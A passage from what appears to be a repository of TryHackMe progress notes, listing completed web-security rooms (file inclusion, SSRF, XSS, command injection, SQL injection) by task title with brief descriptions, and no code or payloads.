58 | - [x] Task 7 A Practical IDOR Example
59 |
60 | - [x] [File Inclusion](https://tryhackme.com/room/fileinc)
61 | - This room introduces file inclusion vulnerabilities, including Local File Inclusion (LFI), Remote File Inclusion (RFI), and directory traversal.
62 | - [x] Task 1 Introduction
63 | - [x] Task 2 Deploy the VM
64 | - [x] Task 3 Path Traversal
65 | - [x] Task 4 Local File Inclusion - LFI
66 | - [x] Task 5 Local File Inclusion - LFI #2
67 | - [x] Task 6 Remote File Inclusion - RFI
68 | - [x] Task 7 Remediation
69 | - [x] Task 8 Challenge
70 |
71 | - [x] [SSRF](https://tryhackme.com/room/ssrfqi)
72 | - Learn how to exploit Server-Side Request Forgery (SSRF) vulnerabilities, allowing you to access internal server resources.
73 | - [x] Task 1 What is an SSRF?
74 | - [x] Task 2 SSRF Examples
75 | - [x] Task 3 Finding an SSRF
76 | - [x] Task 4 Defeating Common SSRF Defenses
77 | - [x] Task 5 SSRF Practical
78 |
79 | - [x] [Cross-site Scripting](https://tryhackme.com/room/xssgi)
80 | - Learn how to detect and exploit XSS vulnerabilities, giving you control of other visitor's browsers.
81 | - [x] Task 1 Room Brief
82 | - [x] Task 2 XSS Payloads
83 | - [x] Task 3 Reflected XSS
84 | - [x] Task 4 Stored XSS
85 | - [x] Task 5 DOM Based XSS
86 | - [x] Task 6 Blind XSS
87 | - [x] Task 7 Perfecting your payload
88 | - [x] Task 8 Practical Example (Blind XSS)
89 |
90 | - [x] [Command Injection](https://tryhackme.com/room/oscommandinjection)
91 | - Learn about a vulnerability allowing you to execute commands through a vulnerable app, and its remediations.
92 | - [x] Task 1 Introduction (What is Command Injection?)
93 | - [x] Task 2 Discovering Command Injection
94 | - [x] Task 3 Exploiting Command Injection
95 | - [x] Task 4 Remediating Command Injection
96 | - [x] Task 5 Practical: Command Injection (Deploy)
97 | - [x] Task 6 Conclusion
98 |
99 | - [x] [SQL Injection](https://tryhackme.com/room/sqlinjectionlm)
100 | - Learn how to detect and exploit SQL Injection vulnerabilities
101 | - [x] Task 1 Brief
102 | - [x] Task 2 What is a Database?
103 | - [x] Task 3 What is SQL?
104 | - [x] Task 4 What is SQL Injection?
105 | - [x] Task 5 In-Band SQLi
106 | - [x] Task 6 Blind SQLi - Authentication Bypass
107 | - [x] Task 7 Blind SQLi - Boolean Based
108 | - [x] Task 8 Blind SQLi - Time Based
109 | - [x] Task 9 Out-of-Band SQLi
110 | - [x] Task 10 Remediation
111 |
--------------------------------------------------------------------------------
/King of the Hill/README.md:
--------------------------------------------------------------------------------
1 |
9 |
10 | ⫷ [**`HacKingPro`**](https://github.com/Anlominus/HacKingPro) ⫸
11 |